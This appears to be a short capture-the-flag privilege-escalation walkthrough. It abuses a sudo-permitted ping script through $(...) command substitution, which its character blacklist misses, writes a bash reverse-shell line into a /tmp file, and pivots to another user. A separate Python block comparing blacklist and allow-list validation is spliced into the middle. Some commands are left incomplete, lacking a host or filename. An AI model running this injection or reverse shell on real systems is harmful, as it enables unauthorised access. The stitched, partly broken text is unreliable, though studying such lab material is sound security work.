sudo -l wins!

sudo nano

/bin/nano /opt/priv

Running a sudo-permitted script as another user:

The script takes our input (it assumes it is an IP address) and runs ping on it. To prevent command injection it checks the input for these characters:

& ; - ` || |

However, it doesn't check for the dollar sign ($). The dollar sign starts a command substitution, $(command), which the shell evaluates before running the surrounding command. So if we pass ping -c 1 $(echo), echo is executed first and then the ping command runs:
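To make the defensive point concrete, here is an added example (not code from the original writeup) that puts the page's blacklist check beside an allow-list check. The blacklist function re-creates the forbidden-character list quoted above and shows that an input containing $( ) passes it; the allow-list function accepts only a syntactically valid IP address, and the ping argument vector is passed to subprocess without a shell, so no shell ever parses the input. Function names, the sample inputs and the use of Python are my assumptions; the page does not say what language the script is written in.

```python
import ipaddress
import subprocess
from typing import List

# The characters the page says the original script blacklists before calling ping.
FORBIDDEN = ["&", ";", "-", "`", "||", "|"]


def blacklist_allows(user_input: str) -> bool:
    """Re-creation of the page's blacklist check (assumed shape, not the original code).

    Returns True if none of the forbidden substrings is present. This is the weak
    check: '$' is never examined, so '$(...)' command substitution is not caught.
    """
    return not any(bad in user_input for bad in FORBIDDEN)


def is_ip_address(user_input: str) -> bool:
    """Allow-list check: accept only a valid IPv4 or IPv6 address, nothing else.

    Any input that is not purely an address (spaces, quotes, '$(', etc.) fails
    to parse and is rejected, regardless of which metacharacters it contains.
    """
    try:
        ipaddress.ip_address(user_input.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(user_input: str) -> List[str]:
    """Return the argument vector for ping, raising ValueError on bad input.

    Using an argument list with shell=False means the input reaches ping as a
    single literal argument; no shell is involved that could expand '$(...)'.
    """
    if not is_ip_address(user_input):
        raise ValueError(f"not an IP address: {user_input!r}")
    return ["ping", "-c", "1", user_input.strip()]


def run_ping(user_input: str) -> int:
    """Validate, then run ping without a shell; returns ping's exit status."""
    return subprocess.run(build_ping_argv(user_input), shell=False).returncode


if __name__ == "__main__":
    # Constructed sample inputs: a normal address and a substitution-style input.
    for candidate in ["127.0.0.1", "$(echo hi)", "8.8.8.8; id"]:
        print(f"{candidate!r}: blacklist passes={blacklist_allows(candidate)}, "
              f"allow-list passes={is_ip_address(candidate)}")
```

The comparison shows why a blacklist of shell metacharacters is the wrong tool: the list has to be complete for every shell the script might run under, whereas an allow-list only has to describe the one thing the script legitimately accepts. Dropping the shell entirely (argument list, shell=False) removes the injection surface even if validation is later relaxed.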

echo 'bash -c "bash -i >& /dev/tcp/ 0>&1"' > /tmp/

chmod +x /tmp/

and run the same script

--- we could've also done $(bash)

Now we are pepper!
